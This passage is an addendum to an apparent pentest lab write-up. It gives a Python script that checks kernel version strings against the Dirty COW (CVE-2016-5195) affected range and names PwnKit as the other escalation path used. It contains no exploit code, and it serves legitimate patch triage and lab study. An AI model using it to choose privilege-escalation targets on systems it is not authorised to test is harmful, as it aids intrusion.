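The decision in step (5), whether a kernel string reported by uname is inside the Dirty COW range, can be automated. The Python example below is added here and is not from the original post or from any of the tools it uses. Upstream, CVE-2016-5195 is present from 2.6.22 and fixed in 4.8.3, 4.7.9 and 4.4.26; enterprise kernels keep the base version and backport the fix, so for them the package release has to be compared. The fixed releases encoded for CentOS/RHEL 6 (2.6.32-642.6.2.el6), CentOS/RHEL 7 (3.10.0-327.36.3.el7) and Ubuntu 16.04 (ABI 4.4.0-45) are values I am asserting from the vendors' errata; confirm them against the vendor advisory before relying on the result, and treat the output as a complement to local_exploit_suggester, not a replacement.

```python
import re

# uname -r strings: "<base>[-<release>]<rest>", e.g. 2.6.32-431.el6.x86_64, 4.4.0-142-generic, 4.4.21
KVER_RE = re.compile(r"^(?P<base>\d+(?:\.\d+)+)(?:-(?P<release>\d+(?:\.\d+)*))?(?P<rest>.*)$")

VULNERABLE, PATCHED, NOT_AFFECTED, UNKNOWN = "vulnerable", "patched", "not affected", "unknown"

INTRODUCED = (2, 6, 22)                       # first mainline kernel with the bug
UPSTREAM_FIXED = {(4, 8): (4, 8, 3),          # stable branches that shipped the fix
                  (4, 7): (4, 7, 9),
                  (4, 4): (4, 4, 26)}
# Distribution kernels: base version -> first fixed package release.
# ASSUMPTION: taken from the vendors' CVE-2016-5195 errata; confirm before use.
VENDOR_FIXED = {
    "el6":    {(2, 6, 32): (642, 6, 2)},      # kernel-2.6.32-642.6.2.el6
    "el7":    {(3, 10, 0): (327, 36, 3)},     # kernel-3.10.0-327.36.3.el7
    "ubuntu": {(4, 4, 0): (45,)},             # linux-image-4.4.0-45 (xenial)
}


def parse_kver(kver):
    """Split a uname -r string into (base version tuple, release tuple, distro tag or None)."""
    m = KVER_RE.match(kver.strip())
    if not m:
        raise ValueError(f"unrecognised kernel version: {kver!r}")
    base = tuple(int(x) for x in m["base"].split("."))
    release = tuple(int(x) for x in m["release"].split(".")) if m["release"] else ()
    rest = m["rest"]
    el = re.search(r"\.el(\d+)", rest)
    if el:
        dist = "el" + el.group(1)
    elif re.search(r"-(generic|lowlatency|aws|azure|gcp|kvm)\b", rest):
        dist = "ubuntu"
    else:
        dist = None
    return base, release, dist


def dirtycow_status(kver):
    """Classify a kernel string against the CVE-2016-5195 affected range."""
    base, release, dist = parse_kver(kver)
    if base < INTRODUCED:
        return NOT_AFFECTED
    if dist in VENDOR_FIXED:
        fixed = VENDOR_FIXED[dist].get(base)
        if fixed is None:                     # base version we hold no vendor data for
            return UNKNOWN
        return VULNERABLE if release < fixed else PATCHED
    if dist is None:                          # vanilla/mainline numbering
        if base >= (4, 9):
            return PATCHED
        fixed = UPSTREAM_FIXED.get(base[:2])
        if fixed is not None:
            return VULNERABLE if base < fixed else PATCHED
    return UNKNOWN                            # other vendors backport too; check their advisory


if __name__ == "__main__":
    # The two kernels seen in this lab, plus a few constructed comparison points.
    for k in ("2.6.32-431.el6.x86_64", "4.4.0-142-generic", "2.6.32-642.6.2.el6.x86_64", "4.4.21"):
        print(f"{k:<28} {dirtycow_status(k)}")
```

For the two hosts in this lab the result matches what the write-up did: 2.6.32-431.el6 is vulnerable, while the Ubuntu 4.4.0-142 kernel is past the fixed ABI, which is why the first host needed PwnKit rather than Dirty COW.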
